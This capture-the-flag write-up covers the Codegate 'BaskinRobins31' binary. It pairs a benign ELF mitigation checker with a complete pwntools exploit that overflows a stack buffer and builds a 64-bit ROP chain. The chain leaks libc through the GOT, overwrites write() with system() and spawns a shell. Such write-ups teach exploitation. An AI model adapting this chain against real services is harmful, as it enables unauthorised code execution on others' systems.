Running checksec on the binary shows that the stack canary is disabled and that it is a 64-bit binary. The remaining values are the defaults, so they do not matter here.
The vulnerability is very simple: the first function that takes user input has a stack buffer overflow. So all that is needed is to overwrite the return address there and build a 64-bit ROP chain.
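As an added illustration (not part of the original writeup), the following script reproduces the checksec-style mitigation report the post relies on by parsing the ELF headers directly: bitness from EI_CLASS, PIE from ET_DYN, NX from the PT_GNU_STACK flags, RELRO from the presence of PT_GNU_RELRO, and the canary heuristically from the `__stack_chk_fail` symbol name. It handles 32-bit ELF as well; `build_sample_elf` and its values are constructed test data, not the challenge binary.

```python
import struct

PT_GNU_STACK = 0x6474e551   # p_flags of this header decide NX
PT_GNU_RELRO = 0x6474e552   # presence means at least partial RELRO
PF_X = 1

def checksec(data):
    """Mitigation report (like checksec) parsed from raw ELF bytes."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    bits = 64 if data[4] == 2 else 32
    end = "<" if data[5] == 1 else ">"      # EI_DATA: little or big endian
    if bits == 64:
        hdr = struct.unpack_from(end + "16sHHIQQQIHHHHHH", data, 0)
        phdr_fmt, flags_idx = end + "IIQQQQQQ", 1   # p_type, p_flags, ...
    else:
        hdr = struct.unpack_from(end + "16sHHIIIIIHHHHHH", data, 0)
        phdr_fmt, flags_idx = end + "IIIIIIII", 6   # p_type, ..., p_flags, p_align
    e_type, phoff, phentsize, phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    nx, relro = False, False                # no PT_GNU_STACK at all => executable stack
    for i in range(phnum):
        ph = struct.unpack_from(phdr_fmt, data, phoff + i * phentsize)
        if ph[0] == PT_GNU_STACK:
            nx = not (ph[flags_idx] & PF_X)
        elif ph[0] == PT_GNU_RELRO:
            relro = True
    return {
        "bits": bits,
        "pie": e_type == 3,                 # ET_DYN
        "nx": nx,
        "relro": relro,
        "canary": b"__stack_chk_fail" in data,  # heuristic: the symbol name is in the strings
    }

def build_sample_elf(canary=False, nx=True, pie=False):
    """Constructed, header-only ELF64 image used as offline test input."""
    stack_flags = 6 | (0 if nx else PF_X)   # RW, plus X when the stack is executable
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\0" * 7
    ehdr = struct.pack("<16sHHIQQQIHHHHHH", ident, 3 if pie else 2, 0x3e, 1,
                       0x400000, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    tail = b"\0__stack_chk_fail\0" if canary else b""
    return ehdr + phdr + tail

if __name__ == "__main__":
    import sys  # usage: checksec.py ./BaskinRobins31; no argument runs the constructed sample
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf()
    print(checksec(data))
```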
Exploit code

```python
#!/usr/bin/env python3
from pwn import *


def main():
    elf = ELF("./BaskinRobins31")
    read_plt = elf.plt['read']
    write_plt = elf.plt['write']
    read_got = elf.got['read']
    write_got = elf.got['write']
    binsh = b"/bin/sh\0"
    bss = 0x602110     # writable .bss slot that will hold "/bin/sh"
    pppr = 0x40087a    # pop rdi; pop rsi; pop rdx; ret (order inferred from the argument setup below)
    pr = 0x400bc3      # pop rdi; ret

    # s = remote("ch41l3ng3s.codegate.kr", 3131)
    s = process("./BaskinRobins31")
    print(s.recvuntil(b"How many numbers do you want to take ? (1-3)"))

    payload = b"A" * 0xB8                       # fill the buffer up to the saved return address
    # read(0, bss, 24): stage "/bin/sh" in .bss
    payload += p64(pppr) + p64(0) + p64(bss) + p64(len(binsh) + 16) + p64(read_plt)
    # write(1, write_got, 8): leak the resolved libc address of write()
    payload += p64(pppr) + p64(1) + p64(write_got) + p64(8) + p64(write_plt)
    # read(0, write_got, 8): overwrite write's GOT entry with system()
    payload += p64(pppr) + p64(0) + p64(write_got) + p64(8) + p64(read_plt)
    # write(bss) now resolves to system("/bin/sh")
    payload += p64(pr) + p64(bss) + p64(write_plt)
    payload += b"AAAAAAAA"
    s.sendline(payload)
    # s.interactive()   # debugging pause in the original; it blocks until you detach

    s.sendline(binsh)                           # consumed by the first read()
    write_real = u64(s.recvn(8))                # the 8 bytes leaked by the write() call
    print("real write : " + hex(write_real))
    libc_base = write_real - 0xf72b0            # offset of write() in the target libc
    system_real = libc_base + 0x45390           # offset of system() in the target libc
    s.sendline(p64(system_real))                # consumed by the second read()
    s.interactive()
    s.close()


if __name__ == '__main__':
    main()
```